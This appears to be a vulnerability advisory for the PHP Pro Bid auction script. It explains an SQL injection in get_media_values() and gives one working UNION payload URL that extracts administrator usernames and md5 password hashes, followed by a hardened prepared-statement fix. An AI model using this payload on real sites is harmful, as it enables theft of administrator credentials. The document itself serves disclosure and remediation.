Keyword: PHP Pro Bid 6.03
PHP Pro Bid is a PHP auction application; the latest version is 6.06. Looking directly at the code:
auction_details.php
Code:
$template->set('msg_changes_saved', $msg_changes_saved);
$item_details['quantity'] = $item->set_quantity($item_details['quantity']);
$custom_detail->save_edit_vars($item_details['owner_id'], $page_handle);
$media_details = $item->get_media_values($_REQUEST['auction_id']); // the request value is passed through with no filtering
$item_details['ad_image'] = $media_details['ad_image'];
$item_details['ad_video'] = $media_details['ad_video'];
$template->set('item_details', $item_details);
$template->set('buyout_only', $item->buyout_only($item_details));
Excerpt from des/class_item.php:
function get_media_values($auction_id, $wanted_ad = false)
{
    $output = array('auction_id' => $auction_id, 'ad_image' => null, 'ad_video' => null);
    $counter_image = 0;
    $counter_video = 0;
    $field_type = ($wanted_ad) ? 'wanted_ad_id' : 'auction_id';
    // This is where the injection lands: $auction_id is concatenated into the query unquoted and unvalidated.
    // The returned media_url is echoed as an image, so the injected row must carry media_type = 1.
    $sql_select_media = $this->query("SELECT media_url, media_type FROM " . DB_PREFIX . "auction_media WHERE " . $field_type . " = " . $auction_id . " AND upload_in_progress = 0 ORDER BY media_id ASC");
    while ($media_details = $this->fetch_array($sql_select_media))
    {
        if ($media_details['media_type'] == 1) // 1 is an image
        {
            $output['ad_image'][$counter_image++] = $media_details['media_url'];
        }
        else if ($media_details['media_type'] == 2) // 2 is a video
        {
            $output['ad_video'][$counter_video++] = $media_details['media_url'];
        }
    }
    return $output;
}
Usage:
auction_details.php?name=<item name>&auction_id=<item ID> and 1=2 union select concat(username,0x3a,password,0x3a),1 from probid_admins --
The image comes back broken, and its path contains the administrator account name and password hash.
In this system the administrator password is stored only as an md5 hash, whereas member passwords are salted (md5($password) . $salt).
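The fix is to stop building the query from the raw request value. Below is a hardened version of get_media_values(), added here as an example and not PHP Pro Bid's own code; it assumes a mysqli connection is available and that DB_PREFIX and the auction_media columns are as shown above.

```php
<?php
// Hardened replacement for get_media_values() (example code, not the project's).
// Assumptions: a mysqli connection $db, the DB_PREFIX constant and the
// auction_media table layout used in the vulnerable function above.

// Validate the request value before it can reach any SQL. Anything that is not a
// plain positive integer (e.g. an id followed by " and 1=2 union select ...")
// yields null instead of being spliced into the query.
function clean_auction_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function get_media_values_safe(mysqli $db, $raw_auction_id, bool $wanted_ad = false): array
{
    $auction_id = clean_auction_id($raw_auction_id);
    $output = array('auction_id' => $auction_id, 'ad_image' => null, 'ad_video' => null);
    if ($auction_id === null) {
        return $output; // refuse to query at all on a malformed id
    }
    // The column name is chosen from a boolean, never from the request,
    // so a fixed whitelist of two names is sufficient here.
    $field_type = $wanted_ad ? 'wanted_ad_id' : 'auction_id';
    // The id is bound as an integer parameter rather than concatenated.
    $sql = "SELECT media_url, media_type FROM " . DB_PREFIX . "auction_media"
         . " WHERE " . $field_type . " = ? AND upload_in_progress = 0"
         . " ORDER BY media_id ASC";
    $stmt = $db->prepare($sql);
    $stmt->bind_param('i', $auction_id);
    $stmt->execute();
    $stmt->bind_result($media_url, $media_type);
    $counter_image = 0;
    $counter_video = 0;
    while ($stmt->fetch()) {
        if ((int) $media_type === 1) {          // image
            $output['ad_image'][$counter_image++] = $media_url;
        } elseif ((int) $media_type === 2) {    // video
            $output['ad_video'][$counter_video++] = $media_url;
        }
    }
    $stmt->close();
    return $output;
}

// Self-check of the validator alone; no database connection needed.
if (clean_auction_id('42') !== 42 || clean_auction_id('42 and 1=2 union select 1') !== null) {
    throw new RuntimeException('clean_auction_id() does not behave as expected');
}
```

With the id validated and bound, the row returned is only ever one of the auction's own media rows, so nothing from other tables can reach the image URL that auction_details.php echoes.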